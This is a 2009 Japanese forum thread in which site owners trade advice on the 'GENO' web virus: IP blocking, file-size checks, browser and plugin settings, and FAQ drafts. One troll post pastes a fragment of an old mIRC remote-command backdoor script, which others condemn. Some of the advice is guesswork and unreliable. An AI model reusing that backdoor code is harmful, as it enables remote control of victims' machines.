GENO:2009/05/17(日) 01:56:09 ID:3/5oEeSQ0
とりあえず、セキュリティソフト屋が手早く対応してくれれば
この騒ぎは沈静化する、よな?
ノートン先生早くしてくれ
安くない金払っているんだから
623 :
GENO:2009/05/17(日) 01:56:57 ID:k/dYf2fw0
誰かわかる人、回答頼む。
94.229.65.160/27 は
94.229.65.160 - 94.229.65.191 の範囲を表す
ってことでいいの?
624 :
g:2009/05/17(日) 01:57:41 ID:jpopUHeK0
ノートン先生頑張って!!!
と言って流石に本日は寝る・・・
色々回答して下さった方本当にありがとうございました。
625 :
geno:2009/05/17(日) 01:58:44 ID:ZlOuERst0
システム復元してcmdとかregeditとか立ち上がるのだが
この状態でカスペオンラインでチェックして
赤じゃなければ寝ていい??
626 :
GENO:2009/05/17(日) 01:59:01 ID:0jOyX3Xk0
627 :
GENO:2009/05/17(日) 01:59:10 ID:/BtRfzOz0
>>613 >>3 と書かないと見てもらえないぞ
だが全文同意。
なぜかマカー向けの話が増えてきたが、内容は脳板やマク板からのコピペで
見ている人は知ってることばかりだ
628 :
GENO:2009/05/17(日) 01:59:28 ID:BFtvD8q80
>3
ttp://www.clamxav.com/ 左のページナビのDLをクリックすればOSのバージョンごとに案内が出る。
ダウンロードしたらまず「ウイルス定義を更新」をクリックして最新の定義をいれること。
環境設定のスケジュールで定期スキャンが設定できるが、ウイルス定義の更新は自動では
されないので、なるべく使用せず手動スキャン推奨。
フォルダ監視ができるのでサイトのローカル保存フォルダを指定するのは大丈夫。
ただしMac対応した亜種が発生して感染しても定義を更新するまで引っかからない可能性が
あるので、あまり過信しないほうがいい。
629 :
geno:2009/05/17(日) 01:59:58 ID:UQnEuMJQ0
ごめん間違えた
>>620 TinkerTool、Onyxはウイルススキャンソフトじゃないです
ユーティリティです
630 :
新参:2009/05/17(日) 02:00:12 ID:afmNfvO0P
>>572 すごいな、このページは安全確認に便利そうだ
631 :
GENO:2009/05/17(日) 02:01:20 ID:wsFKGO1y0
ノートンやウイルスバスターがこのままロクに新規ウイルスに対応出来ない様じゃ
個人向けパッケージウイルスソフトの市場は崩壊するかも知れん
無料で使えるソフトの方がマシって一般層に広まっちゃったらエライ事ですよ
633 :
geno:2009/05/17(日) 02:03:24 ID:GytLXJEE0
>>623 そうだよ
他の範囲指定についても書いてあるからウィキペディアの「IPアドレス」の項目でも見てくれ
>>625 セキュリティ板で同じこと聞いたらちゃんと教えてくれるかもしれない。
635 :
GENO:2009/05/17(日) 02:03:33 ID:r3HWdVMA0
>>632 だから報道されないのかもなww
しかし報道したほうがいいと思うんだがな
実際企業のサイトにも被害広がってるわけだし
636 :
geno:2009/05/17(日) 02:03:48 ID:VhwZt4Ou0
まとめサイトやここみて火狐いれたんだけど
AdobeFlashとかが上手くインストール出来ない…火狐初めてだから不慣れなんだけど
IEとはダウンロードの仕方が違うの?
ググッたりしたけど上手く解決方法が見つからない
637 :
GENO:2009/05/17(日) 02:04:12 ID:qpiUn2RI0
それにしてもVIPなみにスレの伸びがはぇえ
638 :
GENO:2009/05/17(日) 02:05:23 ID:U33DfpPQ0
>>636 AdobeFlashはIEじゃないとダウンロードできないみたいだ
ちょっと前のレスか、前スレにあったような
639 :
GENO:2009/05/17(日) 02:05:37 ID:qpiUn2RI0
>636
どういう風にインストールできないのか言わないといいようがない
640 :
geno:2009/05/17(日) 02:05:45 ID:AvXnoc460
シマンテックエンドポイントプロテクション、昨日から定義ファイルの
更新が三回あったけど対応してるんだろうか
落ち着かねえ
641 :
GENO:2009/05/17(日) 02:05:52 ID:OMRGA0Ne0
>>636 そっから先になるともうそういう板で聞いてくれとしか・・・
642 :
GENO:2009/05/17(日) 02:06:12 ID:33WthBq40
>>338 俺は2chのレスコピペしたりしてる。
レスの要点まとめるだけでもいいんじゃね
643 :
GENO:2009/05/17(日) 02:07:32 ID:/3OwKYN30
>>636 直接ブラウザにはインストールできない。
一旦インストーラーをDLしてからになるよ。
炎狐開いたままだと終了スレと警告が出るので閉じる。
ちゃんとできるから安心しる。
644 :
GENO:2009/05/17(日) 02:07:41 ID:wu0OblXp0
>>636 同じく昨日の明け方に火狐入れたんだけど
AdobeFlashがどうしてもインスコ出来ないんだ…
かといって下手に聞いてpgrされても、とも思って
ネット接続は止めておく以外無かった
645 :
GENO:2009/05/17(日) 02:07:44 ID:EfuA3f1a0
土日だし、ここ同人板だし
自分みたいに徹夜で原稿やりつつチェックしてるのも居るだろう
いい情報でも悪い情報でも何でもいいから欲しいしね、今は
646 :
GENO:2009/05/17(日) 02:07:49 ID:mWnQrBzU0
>>618 トン
この騒ぎ早く収まって欲しいけど
ウイルスの存在を知ってて対処した人よりも存在を知らないで感染してる人の方が
圧倒的に多いよな...マジ怖いわ...
647 :
geno:2009/05/17(日) 02:08:58 ID:8J2Z1lNR0
まとめwiki見ろっていうのは釣りだからな
一番危ないのはまとめwiki
648 :
GENO:2009/05/17(日) 02:09:15 ID:wXDJe0Ek0
>>3 >>613が言っている通りで、Macユーザー用のページを作るなら
冒頭にこのように入れてから、対策をコピペしてほしい。でないと誤解を招く。
↓
今現在のウイルスの構造ではMacに感染しない。
ただし変異してウィルスの対象になるかもしれない可能性がわずかながらあるので
下記の対策を予防としてやっておきましょう。
649 :
GENO:2009/05/17(日) 02:09:41 ID:BFtvD8q80
>>606 知人情報なので確定ではないです。
GENOが出回った後に定義の更新がきてるのでということでした。
>3
>628に対応確定ではない旨追記お願いします。
650 :
GENO:2009/05/17(日) 02:09:59 ID:eFkdwwt3O
何で?
651 :
geno:2009/05/17(日) 02:10:13 ID:8/IcS20M0
アドビのサイトからフラッシュプレイヤーをダウンロード
FireFoxを閉じてさっき落としてきたexeを実行
インスト出来たらfirefoxを起動する
IEみたいに自動ではインストできないよ。
652 :
GENO:2009/05/17(日) 02:10:46 ID:k/dYf2fw0
>>633 ありがとう。
ウィキペディアと、どこぞのサイトで見つけた早見表を参考に出してみたので
多分間違いないと思う。
さっそくFWの範囲指定に追加するわ。
653 :
GENO:2009/05/17(日) 02:10:48 ID:RvywqyVs0
Vistaは大丈夫なの?
cmd.exe、regedit.exeは起動出来てるけど他の確認方法が…
654 :
GENO:2009/05/17(日) 02:10:53 ID:/3OwKYN30
>>643 あと、js切ってるなら、とりあえずアクセスする時だけ
許可してからの方がいいかも?
サイトにまとめwikiアドを忠告という意味で載せといたんだが
一番危ないのはまとめwikiをみて不安が・・・載せたままで大丈夫かな?
656 :
GENO:2009/05/17(日) 02:11:32 ID:n5RlUS/yP
>>572のページで確認してみたところ、kernel32.dllは以下のものと全て一致
自分、まだSP2なんだけどSP3GDRフォルダに入ってたw
kernel32.dll バージョン→5.1.2600.5781 日付→2009/3/21 時間→23:07 サイズ→1.235.968
これは安全って事でいいんですかね?
657 :
GENO:2009/05/17(日) 02:11:45 ID:U0dilrcr0
658 :
geno:2009/05/17(日) 02:12:20 ID:TYMPcO5S0
>>653 散々言われてるけどvistaだから絶対安全という訳ではない、いつ亜種がでるかも分からんし
とりあえずやれる事だけやっとくかそれでも不安なら回線切ってさっさと寝ろ
659 :
GENO:2009/05/17(日) 02:12:24 ID:Co0JIJet0
647は釣りだろ。
でないと恐すぎる
661 :
geno:2009/05/17(日) 02:12:45 ID:GytLXJEE0
662 :
GENO:2009/05/17(日) 02:12:59 ID:OMRGA0Ne0
>>653 自分もvistaだが
cmdもregditも起動できるか。
sqlsodbcのサイズも確認。
カスペルとニフティで全部スキャン。
サイトのソースも全部チェック。
ぐらいできてれば今のとこいいんじゃまいか?
663 :
GENO:2009/05/17(日) 02:13:02 ID:hOpYxCGd0
うちはGENOの簡単な説明と注意勧告と自分の環境はセフセフなことだけ載せたよ
URL貼りつけるのも不安に思わせるかもしれないし
wikiその他のまとめの名前挙げて自分で調べてくださいって書いた
664 :
GENO:2009/05/17(日) 02:13:19 ID:8hzwlEy90
私は
>>428ではありませんが
>>607わかりやすかったです
ですがAdobe Flash Player10と Adobe Flash Player10 ActiveXとは
同じものなのでしょうか
どうもそれ以外にAdobe Flash Playerは入っていないようです
へたにアップロードしないほうがいいですかね
665 :
GENO:2009/05/17(日) 02:13:38 ID:80tcfrIh0
>>655 自分もサイトにまとめをリンクしてるが
ちょっと怖くなってきた
666 :
:2009/05/17(日) 02:14:56 ID:27OC+pNi0
今更だが
>>9って不正確だね
> 【よくある質問】
> Q:感染するとどうなるの?
> A:あなたのパソコンに侵入したウイルスは、ネットに繋がった時点で
> パスワード、クレジットカードの情報、FTPのパスワードなどを抜いてしまいます。
> 感染者のパソコンからアップされたサイトのファイルにウイルスコードが自動挿入され、
> そのサイトを見た人を感染させます。
FTPのパスワードを抜くのはおそらくFTPで通信した時点だし、
その他の情報は抜かれるかどうかまだ謎のままだ
667 :
GENO:2009/05/17(日) 02:14:56 ID:NfFnEcJ60
まとめwiki貶める奴が定期的に湧くがどういう了見だ?
668 :
GENO:2009/05/17(日) 02:15:07 ID:J++bR2Wb0
サイトのソースに不自然な記号の羅列がなければセーフでいいのかな
669 :
GENO:2009/05/17(日) 02:15:08 ID:uj1d73AxO
なぜ危険なのかについて一切説明がないのになぜ怖くなるのかが分からんわ
670 :
GENO:2009/05/17(日) 02:15:10 ID:U0dilrcr0
>664
Adobe Flash Player10…Firefox、Safari、Opera用
Adobe Flash Player10 ActiveX…IEシリーズおよびIEエンジンを使ったブラウザ用(スレイプニルなど)
671 :
GENO:2009/05/17(日) 02:15:13 ID:KzlawzX60
なんのためにまとめwikiの人が張り付いて情報更新してくれてるんだ…と思うが
信用ならないなら自分でまとめ作ってサイトにおけば?
このスレみて同人板の程度の低さに辟易した
673 :
GENO:2009/05/17(日) 02:15:34 ID:KyGFEZfI0
連続投稿がしつこいな
>>626 さっきのURLをもっかい開いて調べてね
セキュリティ更新プログラムに関する情報
├セキュリティ更新プログラムの展開
.:├Windows XP (すべてのエディション)
.: :├ファイル情報
結論からいえば問題はないんだけど。
>>636 Opera 入 れ な い か ?
674 :
geno:2009/05/17(日) 02:15:39 ID:TYMPcO5S0
皆ちょっと落ち着け、ウィキは管理者が感染してもウィキの鯖が感染してなければ大丈夫なんだろ
今の所その報告は無い
675 :
GENO:2009/05/17(日) 02:16:01 ID:BRejwb/g0
情強気取りが撹乱させてるだけです
676 :
GENO:2009/05/17(日) 02:16:25 ID:5kZopWV90
677 :
geno:2009/05/17(日) 02:16:39 ID:8J2Z1lNR0
みんなこわがっておもしろいね^q^
678 :
GENO:2009/05/17(日) 02:16:50 ID:PrgIGZV1P
wikiの「感染前の対策」に
>>623の範囲も書いといたほうがいいな
679 :
GENO:2009/05/17(日) 02:17:12 ID:2v0JSZ+40
そんなことよりサメの話しようぜ
680 :
:2009/05/17(日) 02:17:39 ID:27OC+pNi0
539 名前:げの[sage] 投稿日:2009/05/17(日) 01:35:04 ID:8J2Z1lNR0
kerner32がそんなに怖いなら削除すればいいだろ
647 名前:geno[sage] 投稿日:2009/05/17(日) 02:08:58 ID:8J2Z1lNR0
まとめwiki見ろっていうのは釣りだからな
一番危ないのはまとめwiki
↑悪質な冗談ですね
N速の連中の冷やかしが来てるから冷静にな
682 :
geno:2009/05/17(日) 02:18:08 ID:TYMPcO5S0
ID:8J2Z1lNR0
は↑の通りどう見ても釣りだから気にするな
疑心暗鬼になる気持ちは分かるがちょっとパニくり過ぎやしないか
質問もテンプレに目を通してからにしろ
683 :
GENO:2009/05/17(日) 02:18:19 ID:OMRGA0Ne0
>>8J2Z1lNR0
池沼はさっさと糞して練れ
まとめサイトの感染云々は杞憂すぐる
まあまとめサイトも感染するかもしれんけどな
686 :
:2009/05/17(日) 02:18:59 ID:27OC+pNi0
wikiにfirefoxの先読み無効とかあるけどアホかよ
先読みされても実害無いだろ
688 :
GENO:2009/05/17(日) 02:19:36 ID:NfFnEcJ60
>>666 例えば尼で買い物しようとして個人情報が抜かれる
例えばFTPで繋げた時にパスとファイルに接触する
という意味にとったが?<ネットに繋がった時点
簡単なFAQだし、不正解とはいえないだろう
気になるなら正しい簡潔な文章をおまいが作ればいいだけ
689 :
GENO:2009/05/17(日) 02:19:40 ID:4M+T0NuqO
>>683 糞を練ってPCに塗ったくるんですねわかります
690 :
GENO:2009/05/17(日) 02:19:43 ID:eiE9QTaXO
>>655なんだけど、パニクりすぎてた、すこし落ち着いてみる。
反応ありがとう
692 :
GENO:2009/05/17(日) 02:20:40 ID:k/dYf2fw0
>>3 94.229.65.160/27 は
94.229.65.160 - 94.229.65.191 の範囲を表します。
wikiの表記になぞらえると
94.229.65.160/27(94.229.65.160 - 94.229.65.191)
です。
>>678 サンクス、今それレスしようと思ってた。
693 :
GENO:2009/05/17(日) 02:21:08 ID:juU+TMyj0
もう30分おきにElleFileInfoで容量確認してる自分がいるww
694 :
GENO:2009/05/17(日) 02:21:12 ID:33WthBq40
>>494 俺、Kernel32のサイズが868 KB (888,832 バイト)なんだけど
695 :
GENO:2009/05/17(日) 02:21:40 ID:NfFnEcJ60
>>687 Googleの検索結果見た時にまずいんだよ
過去ログ嫁
696 :
GENO:2009/05/17(日) 02:21:42 ID:0jOyX3Xk0
>>673 見てみた。そうか、全部展開しとかなきゃいけなかったんだな
すまない、ありがとう
あーちくしょう
レポートの参考資料探したいのに怖くてググれねぇ
697 :
名前欄にスレ名入力推奨@自治スレにてLR改定議論中:2009/05/17(日) 02:21:46 ID:wbhRHHzg0
698 :
GENO:2009/05/17(日) 02:22:03 ID:KyGFEZfI0
>>688 それ、全然意味合いが違うよ。
FTPのパスだけを抜こうとするなら、FTP通信を盗聴するトロイが内に潜んでいれば意味が分かる。
でも、あらゆるパスとかを抜こうとすると、それでは話が処理できなくなる。
699 :
GENO:2009/05/17(日) 02:22:32 ID:5igu3G/B0
まとめwikiは安全だって前スレから外出だろうが
釣りや荒らしはやめろ
700 :
geno:2009/05/17(日) 02:22:50 ID:8J2Z1lNR0
だが愉快犯によりまとめが改竄されたのは事実
まとめwikiは絶対大丈夫と思ってる奴いるだろ
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
702 :
GENO:2009/05/17(日) 02:22:52 ID:KyGFEZfI0
703 :
GENO:2009/05/17(日) 02:23:24 ID:yaqRgcE30
結局、
>>579が聞いてる
「ウィンドウズFWで特定IP遮断」というのは不可能ってことなのかな?
前スレでも聞いてる人いたけど回答無かったよね
もしやり方分かる人いたらご教示願いたい
704 :
名前欄にスレ名入力推奨@自治スレにてLR改定議論中:2009/05/17(日) 02:23:27 ID:wbhRHHzg0
705 :
geno:2009/05/17(日) 02:23:31 ID:TYMPcO5S0
ID:wbhRHHzg0
ID:tVuAN5GY0
名前欄入れてない奴は他所から来た奴だろうからこういうのに惑わされるようなアホは
NGIDにぶっこんどけ
706 :
GENO:2009/05/17(日) 02:23:56 ID:33WthBq40
スレの流れ速すぎてだめだ
707 :
GENO:2009/05/17(日) 02:24:02 ID:RpiSgP/n0
>>672 ジャンルスレなんかもっとひどいぞ
自分のところはジャンルスレで「感染してた!皆も注意してね!」というレスが
「何で本スレ(ここ)に報告しねーんだよカス」って最悪でボコボコにされてたw
708 :
GENO:2009/05/17(日) 02:24:04 ID:mWnQrBzU0
>>657 KOEEEEEEEEEEEE
そっくりすぎ
709 :
GENO:2009/05/17(日) 02:24:14 ID:/hU3CHd30
愉快犯が大量にきてるな
711 :
GENO:2009/05/17(日) 02:24:23 ID:x5LHoU8R0
>>389のとおり設定しようとしたら、例外ルール設定を入力して「プロファイルの設定」ウインドウまでは
「OK」ボタン押せるんだけど、その後続けて「パーソナルファイアーウォール」ウインドウの「OK」ボタン押しても、
「現在使用中のパーソナルファイアーウォールプロファイルに対しては変更を保存できません。
ウイルスバスター2009を再起動してから再度実行してください」とアラートが出て、
キャンセルボタンを押すしかできず、設定ができません。
バスターを一旦終了して再起動しても、有効なプロファイルを別のものに切り替えてから
有効でないプロファイルを編集して、そこに設定しようとしても同じく
アラートが出て結局、設定ができない……なぜだorz
712 :
GENO:2009/05/17(日) 02:24:49 ID:uNaTeiSJ0
GENO祭り会場はここか
713 :
GENO:2009/05/17(日) 02:24:56 ID:RMb266980
セキュ板本スレに比べたらましじゃないかなぁ、なんて
714 :
GENO:2009/05/17(日) 02:25:23 ID:n5RlUS/yP
>>694 とりあえず、ファイルバージョンをコピペして
>>527のリンク先で検索して引っかかれば安全らしいですよ
そもそもkernel32.dllはこのウィルスとは関係ないっぽい?
>>701 こんな事態なのにガキの遊びの如く使い古されたウィルスコード貼るなよ・・・
ビクっとなるから
悪い冗談だ
715 :
GENO:2009/05/17(日) 02:25:43 ID:4MOMvxOF0
>>657 先月から騒がれてるのに情報遅すぎだろお前ら
716 :
Geno:2009/05/17(日) 02:26:14 ID:/3OwKYN30
717 :
GENO:2009/05/17(日) 02:26:14 ID:5igu3G/B0
>>701 それ貼るなっていってるだろ
愉快犯が湧いててうざいな
718 :
geno:2009/05/17(日) 02:26:33 ID:VhwZt4Ou0
>>636です
レスしてくれた方々ありがとう
>>643 デスクトップにアイコンみたいなのがインストールされて火狐閉じて
それを実行→セットアップ完了したんだけど、これで大丈夫なのかな
叩き台作ると豪語しておいてツギハギでスマソ
スレに出たマカ向けを集めて組み合わせてみた
-----------ここから---------------
今現在のウイルスの構造ではMacに感染しない。
ただし変異してウィルスの対象になるかもしれない可能性がわずかながらあるので
下記の対策を予防としてやっておきましょう。
○10.3までのOSユーザー
Flash Playerを外す
Acrobat ReaderおよびPDFの拡張子割り当て機能を外す
○TigerとLeopard
Acrobatは9.1、Flash Playerは10.0.22.87以上に更新する
Acrobat Readerの初期設定からAcrobat JavaScriptをオフにする(AcrobatReaderは「プレビュー.app」で代用可能なので始めから入れない手もある)
10.5.7のアップデートは
ATIグラフィックスカード搭載MacでVMware Fusionの3Dアクセラレーション機能使ってると不具合ありなので該当者は注意。
ttp://journal.mycom.co.jp/news/2009/05/15/006/index.html ○Webブラウザ内閲覧機能を切るかJavaScriptオフにする
○Firefoxの場合
3.0.10に更新してNoScript入れること(ツール→アドオン→アドオンを追加→「NoScript」を入れる)
非表示状態になったFlashコンテンツをどうしても見たいときはマウスポインタを置き、リンク先が不正URLでないか確認した上で「一時的に許可」
○Safari・OmniWebなどWebKitベースブラウザの場合
「ダウンロードしたファイルを開く」をオフにする(Safariの「全般」で設定できるが見落とされてしまうことが多い)
Safariの開発メニューを表示させる方法:環境設定→詳細→メニューバーに"開発"メニューを表示 にチェックを入れる
Safariの「開発」でJavaScriptをオフにした場合でも、設定→セキュリティ→「JavaScriptを有効にする」および「プラグインを有効にする」も切っておく。
OmniWebなら初期設定→プラグインでFlashプラグインの活動を停止できる(OmniWebだけのシャットダウン、Safariには影響しません)
連投引っかかったからリモホ変え
>>695 めんどくせえ教えろ
先読みされてもjs実行されないだろうが
>>704,705
^w^
721 :
GENO:2009/05/17(日) 02:26:49 ID:n5RlUS/yP
722 :
げの:2009/05/17(日) 02:26:54 ID:4cH5DQKP0
この際、新情報スレと、どんな質問にも答えるスレの二つ作っても良いんじゃね?
過去ログ見れば大体わかろうもんだが、
初めてこのウイルスを知って、ウイルス検知ジャンルだったら、一刻も早く対処したいだろうし、
質問被っても答えてやれる場所があったほうが安心じゃないかと思う。
聞かれるほうも、毎度毎度、過去ログ見ろって言ったって、イライラするだけだし、
結局同じ質問はなくならんと思うんだよね。
あと、火狐を入れたらそれで安心と思っている人が多いので、
入れただけじゃ安心じゃないよという警告文と、なぜ火狐が推奨されてるのかも書いたほうが。
googleの先読み禁止とか、noscriptの導入方法とか、
確かに、サイト運営してるならそれぐらい自分で調べろといいたいところだが、
一般的に、サイトの運営って、今は本当に何も知らなくても誰でもできる時代なのだから、
それこそ、おじーちゃんおばーちゃん、下は小学生まで、みんな感染していると思ってあたったほうがいいと思う。
同人板もしかり。
つかこれ、解決すんの?
723 :
579:2009/05/17(日) 02:27:42 ID:Iji5kOgt0
>>579です
ありがとうございます、
しかしWindowsFWにこれらを記述できるような場所がないのです
もしご存知でしたらWindowsFWでこれらを設定する方法を教えていただけないでしょうか
リストはまとめサイトにあったものをコピペしただけなので
申し訳ありません、どういう意味の数字なのかはわかりません
724 :
GENO:2009/05/17(日) 02:27:46 ID:juU+TMyj0
>>716 自動的にsqlsodbc.chmの容量見てくれるんだお
725 :
GENO:2009/05/17(日) 02:28:01 ID:2v0JSZ+40
さあみんな良い子だから名前欄に〜をNGに突っ込もうねー
○自分のサイトが汚染されていないかソースを見て確認すること、FTPパスを変更すること
○動画はようつべならMacTubes、ニコならMacNicoTunesで見る。
○BootCampでXPを入れている人
C:¥WINDOWS¥system32¥sqlsodbc.chm このサイズ表示(ディスク上のサイズではない)
50,727 bytes以外の数値に改ざんされていないかチェックすること。
729 :
geno:2009/05/17(日) 02:30:33 ID:/3OwKYN30
>>718 ツール→アドオン→プラグイン
で、 ShockwaveFlash10.0r22
になってたらおk
730 :
GENO:2009/05/17(日) 02:30:45 ID:NfFnEcJ60
>>698 ここはセキュ板と違ってウイルスの挙動や中身を解読する知識はない。
実際に何が行われているかまで検証はできない。
起こったことから想像して、被害の可能性を示唆して注意喚起していくだけ。
それともこれは、FTPのパスを抜き続けることのみが
目的のウイルスなのか?
作者の自己申告ならともかくw
亜種がどんどん出ているし、こっちからは目的を絞れないよ。
731 :
723:2009/05/17(日) 02:30:48 ID:Iji5kOgt0
732 :
GENO:2009/05/17(日) 02:31:14 ID:75lN/Fis0
で、先読み無効は意味なしでいいんだな?
734 :
GENO:2009/05/17(日) 02:32:09 ID:uNaTeiSJ0
735 :
geno:2009/05/17(日) 02:32:52 ID:WbbmDS0L0
>>688 そもそも
>>9のテンプレを今後使うことになってるのかどうか知らんが、なってるとすれば
新種のコンピュータウィルスが流行っています。
感染サイトを見ただけで感染発症し、大半のアンチウィルスソフトで検知されません。
変化が早く、一部の検知可能なソフトも最新型には対応できていない状況です。
全ジャンルでサイト管理人・閲覧者に感染チェックを推奨します。
特にサイト管理人は二次被害を起こしてしまいますので、早急な確認が望ましいと思われます。
【よくある質問】
Q:感染するとどうなるの?
A:あなたのパソコンに侵入したウイルスは、
FTPによる通信を行った時点でFTPのIDとパスワードを盗みます。
そうなるとFTPでアップロードしたサイトのファイルに悪意を持ったコードが勝手に挿入され、
そのサイトを見た人を感染させます。
その他の個人情報が盗まれるのかどうかはまだわかっていません。
Q:VistaとMacは感染しないの?
A:某企業サイトでの発見直後はVista、Macには感染しないと言われましたが
新種も現れており安心できる状況ではありません。
詳細・感染の確認方法・対策は以下のまとめWikiと
>>2-5あたり
同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/
736 :
3:2009/05/17(日) 02:32:58 ID:bMv9yql40
>>389 ウイルスバスター2009(ver.17.1.1251) の「処理」は「拒否」ではないだろうか。
うちのバスター先生の処理項目は、「許可」「拒否」「警告」だよ。「遮断」はない。
>>578 >>1 の同人サイト向けまとめwikiにある。
もっと詳しく知りたいなら
ttp://www3.atword.jp/gnome/ かな。
ただし、知識がないと読んでも分からない上に不安になるだけだと思う。
737 :
GENO:2009/05/17(日) 02:33:02 ID:uQV6yiNu0
とりあえず
嘘を嘘と見抜ける人でないと(掲示板を使うのは)難しい
738 :
GENO:2009/05/17(日) 02:33:14 ID:B5k2mtIVP
初期から動いてくれてるまとめwikiさんなどは
都度対応してくれてるから、よっぽどなことがない限りは
疑わなくても大丈夫だと思う。
それに今のところは主に最新バージョンに更新さえしてれば
ほぼ心配ないらしいし、実害もまだFTPパスに関してのみ。
心配なら携帯や別PCからFTPパス変更して放置しておけばいい。
FTP触らなければ発信源になることもなさそうだし、
それ以上の不安材料を片っ端から持ってこられると
混乱を招くだけで良くないよ。
FTPソフトいじった人は、すぐにまとめwiki見ればいいし、
FTPソフトいじってない人はまず余計なことせず、ゆっくりスレ読んでまとめwiki読んで
それから質問でも遅くないと思う。
違ってたら訂正お願いします。
739 :
GENO 質問:2009/05/17(日) 02:34:00 ID:txLmXpE00
オペラやたらと推奨してる人がいるけど
火狐よりはオペラの方が簡単だとか便利だとかそういうメリットがあるの?
Vistaです。
Wikiに書いてあるとおりにsugsqlsodbc.chmを探したんですけど
どこにもないんですがこれって感染でしょうか?
741 :
GENO:2009/05/17(日) 02:34:19 ID:ANsojTlv0
>>733 標準で有効になっているやつはOK。わざわざ無効にする必要はない。
742 :
GENO:2009/05/17(日) 02:36:01 ID:OMRGA0Ne0
>>740 「C:\Windows\Help\mui」以下のディレクトリにsqlsodbc.chmがあります
sqlsodbc.chm を右クリック → プロパティでボリュームを確認
1個のファイル 50,727バイト と表示されればOK
49.5kbyteと表示された場合、右クリック、プロパティで50,727byteかどうか見る
743 :
GENO報告:2009/05/17(日) 02:36:04 ID:U33DfpPQ0
セキュ板で成美堂出版が感染といってたけど既出?
744 :
GENO:2009/05/17(日) 02:36:37 ID:O/DTZ3Lf0
>740
ここで問うよりもまとめwikiを見る・過去ログを検索するなどしたほうが早いと思います
745 :
GENO:2009/05/17(日) 02:36:51 ID:txLmXpE00
>>731 ここだったか前スレだったか、WindowsFWではIP指定しての遮断ができないってあったぞ
他にFWがないのなら、フリーソフト入れて遮断した方がいいと思うが
746 :
GENO:2009/05/17(日) 02:37:03 ID:C9Hc9U/u0
747 :
GENO:2009/05/17(日) 02:37:22 ID:DRV8Pz+j0
このウイルス確認され始めたの何時頃?
このスレ見るまで今日だけでかなりのサイト踏んでしまったんだが
748 :
oneg:2009/05/17(日) 02:37:28 ID:/hd4HEvi0
749 :
GENO:2009/05/17(日) 02:37:36 ID:e8kJnLAP0
>>741 Firefoxの先読みの無効意味ないのか・・・
言われてみればそりゃそうだ
そもそもgoogleの検索なんかは大丈夫なんじゃないの
リボンマジックとか速攻で攻撃サイト指定されたし
750 :
GENO:2009/05/17(日) 02:37:45 ID:M8hZcTQ40
GoogleChrome使ってるやつはいないのか?
751 :
GENO:2009/05/17(日) 02:37:48 ID:uQV6yiNu0
752 :
geno:2009/05/17(日) 02:38:03 ID:33WthBq40
>>747 先月からだけど。
流行り出したの三日前
753 :
GENO:2009/05/17(日) 02:38:21 ID:2LNaQ+620
>740
まとめに書いてあるからちゃんと読め
754 :
な:2009/05/17(日) 02:39:20 ID:eQgBzqzUO
>>740 VistaはUAC解除してなきゃ感染しない
以上
755 :
GENO:2009/05/17(日) 02:39:58 ID:UGfaxfX10
>>730 感染ルートと、トロイは別物として考えた方が良い。
ルートは、埋めないとなにを仕込まれてしまうか分からない恐怖の穴。
FTPのパスぶっこ抜かれるだけで済んでたらまだマシな話で(ry
トロイは、FTPの通信を監視して、アカとパスを抜いていくみたい。
>>739 どっちでもいいんじゃない。Opera使ってるから薦めるけど、
火狐がいいならそっちを使えばいいと思う。
>>723 さっき簡単にwinのFW確認したけど設定する所見当たらないね
>>740 C:\Windows\Help\muiに
数字のフォルダがあってその中にずらっと並んでる。
数字はバージョンによって違うのでわざと省いてるので注意。
0411とか0409とかそんな感じのフォルダがある。その中にあるはず。
758 :
GENO:2009/05/17(日) 02:40:36 ID:DRV8Pz+j0
>>751-752 そんな昔からあったのか、恐ろしい
とりあえず昨日まで起動出来たし今はavast先生が何も検出しなかったから大丈夫かな ありがとう
759 :
GENO:2009/05/17(日) 02:40:42 ID:0jOyX3Xk0
>>702 そうする
ああ少し落ち着いてきた
今カスペ先生に確認してもらってんだけど、長いわー…
>>747 まとめサイトからいけるGENOまとめに経緯載ってるよ
760 :
718:2009/05/17(日) 02:42:15 ID:VhwZt4Ou0
761 :
げの:2009/05/17(日) 02:42:28 ID:4ltajgR70
saymoveが感染ってのを見て対策しといてよかった
知ったのが今日だったらかなりgkbrしてたんだろうな…
762 :
GENO:2009/05/17(日) 02:42:43 ID:uNaTeiSJ0
>>748 あー名前欄じゃなくてIDであぼーんしてたのか
763 :
GENO:2009/05/17(日) 02:43:23 ID:ErQsewcc0
このスレバスターが反応するんだけど?
764 :
692:2009/05/17(日) 02:43:31 ID:k/dYf2fw0
>>3 って、
>>692はノートン2008の設定方法のところにはすでに書いてありますね。
すみませんでした。
765 :
新参:2009/05/17(日) 02:43:57 ID:afmNfvO0P
>>738 まとめWikiの管理人さんが信用できるとしても、第三者の編集がありうる
リンク書き換えの警告も付け加えた方が良い
>>749 Googleを信頼しすぎてはダメ
たとえばティアラモードは、数時間経ってもまだ損害サイト指定されてない
766 :
geno:2009/05/17(日) 02:44:35 ID:hqnP7TwX0
>>739 どうせそんなにHDDの容量食わんから自分で使って判断するのが一番だ。
それが面倒ならブラウザスレ探してそっちで聞きましょう。
767 :
GENO:2009/05/17(日) 02:44:36 ID:KYjyDRzp0
768 :
GENO:2009/05/17(日) 02:45:13 ID:Ykec17tTO
769 :
GENO:2009/05/17(日) 02:45:13 ID:oK3qU97A0
>>765 少なくとも今はWiki編集できるのは管理人氏だけだからまだいいけどな。
770 :
GENO:2009/05/17(日) 02:45:41 ID:QJhzLXAd0
うちのXP
sqlsodbc.chm 1,323byte 2009年3月21日、23:18:57更新
kernel32.dll 1,232,384 2009年3月21日、23:18:57更新
sqlsodbc.chmのサイズが。。。改竄されてる・・・? 感染か?
そしてkernel32.dllの更新日時が全く一緒
これはkernel32.dllのタイムスタンプにsqlsodbc.chmが合わせて
windows updateに偽装しようとしているのか・・・?
771 :
geno:2009/05/17(日) 02:46:09 ID:ANsojTlv0
あれ? キーロガー仕込まれるって話じゃなかったっけ。
それでFTP関係以外のIDやパスワードにも注意ってことじゃなかったか?
普段に比べてESETがちょこちょこ定義データアップしてるが仕事しとるのかね
サイトのアップデート情報も一緒に更新してくれればいいのに
773 :
GENO:2009/05/17(日) 02:47:56 ID:wLvPYWhg0
>>694 自分もKernel32のサイズが868 KB だった
最終更新日は09/04/15の07:13
もしこれが感染した日だったら、その後サイトの更新をしてしまっているが
